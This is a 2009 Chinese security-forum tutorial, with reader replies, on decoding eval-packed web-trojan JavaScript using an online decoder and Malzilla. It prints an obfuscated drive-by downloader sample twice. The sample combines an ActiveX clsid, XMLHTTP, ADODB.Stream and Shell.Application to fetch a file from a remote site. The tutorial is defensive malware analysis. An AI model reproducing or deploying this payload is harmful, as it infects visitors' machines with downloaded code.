浅谈eval解密之——工具篇 bbs.ikaka.com

networkedition - 2009-5-20 9:48:00

卡卡讲堂之网马解密初级篇
卡卡讲堂之网马解密中级篇
卡卡讲堂之网马解密高级篇(swf网马解密)
卡卡讲堂之网马解密高级篇(pdf网马解密)
1.Freshow解密工具的详细用法；
2.网马解密之——Eval篇；
3.网马解密之——Document.write篇；
4.网马解密之——Alpha2篇；
5.网马解密之——Shellcode篇；
6.网马解密之——Base64篇；
7.网马解密之——US-ASCII篇；
8.浅谈eval解密之——工具篇

引用:

在前期讲解的eval这种加密形式，我们利用alert这个函数来对其进行解密，这种方法是有些弊端，就是在解密的过程中很繁琐，且如果eval加密的代码很长，会出现在弹出时浏览器长时间不响应或弹出代码不完整的情况。那么是否有工具来有效解决这个问题呢，答案是毋庸置疑的，下面我们就讲解如何利用工具来快速对eval加密进行解密。

引用:

在这里我们提供两个工具一个是glacierlk大牛的在线解密(在这里也是给小g做个宣传哈)，还有一个工具就是malzilla(神器)，针对这两种工具我们来详细讲解一下，eval加密的另几种解密方法。

引用:

在线解密工具：http://glacierlk.cn/openlab/jm.htm，附件为malzilla(神器)，我这里神器是英文版，网上有汉化版，有想使用汉化版的自己百度一下吧 O(∩_∩)O~

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

附件: malzilla_1.2.0.rar

networkedition - 2009-5-20 9:51:00

利用在线解密工具进行eval解密，在这里我们还是使用前期讲解的eval加密源代码：

[复制到剪贴板]

CODE:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))

networkedition - 2009-5-20 9:51:00

将上述代码粘贴至在线解密的操作区(临时想了一个名称)，详见下图：

点击右边eval解密按钮完成解密：

networkedition - 2009-5-20 9:52:00

解密结果见下图：

我们看到这种解密方法是很快速实用，只需轻点按钮即可完成解密。在这里再次感谢一下glacierlk大牛，提供这么好的在线解密工具。在后续网马解密教程中，我们也会结合这个在线解密工具来进行讲解。

networkedition - 2009-5-20 10:15:00

2. 使用malzilla(神器)进行eval解密，在这里代码仍就使用前期讲解代码：

[复制到剪贴板]

CODE:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))

networkedition - 2009-5-20 10:22:00

我们将上述代码粘贴至神器的decode操作区，详见截图：

networkedition - 2009-5-20 10:22:00

接下来我们点击一下run script 按钮来执行代码，注：在这里的操作类似使用alert这个函数来进行解密一样，解密的过程中不会导致将网马下载并运行起来，而导致系统中招。

此时会弹出一个确认的对话框，大致内容意思为：此脚本包含eval函数时候替换为evla，点击yes(是)，详见截图：

networkedition - 2009-5-20 10:35:00

点击是确认后，在下部操作区域会显示解密的结果，详见截图：

happysunday2003 - 2009-5-21 22:33:00

哇塞

第一排

第一个

谢谢楼主介绍的工具

请问下

那最后解出来的那么多gameeeeeeesss是什么意思

ycgk - 2009-6-7 0:54:00

过来学习！p,a,c,k,e,d这个工具也可以用来解EVAL么？

networkedition - 2009-6-8 9:30:00

可以解密，那个应该是早期网马解密小g出的一款工具。

淩乱德心情↘ - 2009-6-13 16:07:00

貌似这个难啊？

於陵闲云 - 2009-7-2 21:16:00

用汉化的神器总是出错，用英文的没有问题

kav2046 - 2009-7-18 18:21:00

继续来学习楼主的精品文章！感谢楼主的详细讲解，又学到了新的东西！

零度的穷浪漫 - 2009-8-2 22:34:00

这个真的很方便啊，太感谢楼主了

springyun - 2010-5-22 14:49:00

继续学习

鹰丶风少 - 2010-7-28 15:27:00

又学到东西了:kaka9:

瑞星卡卡安全论坛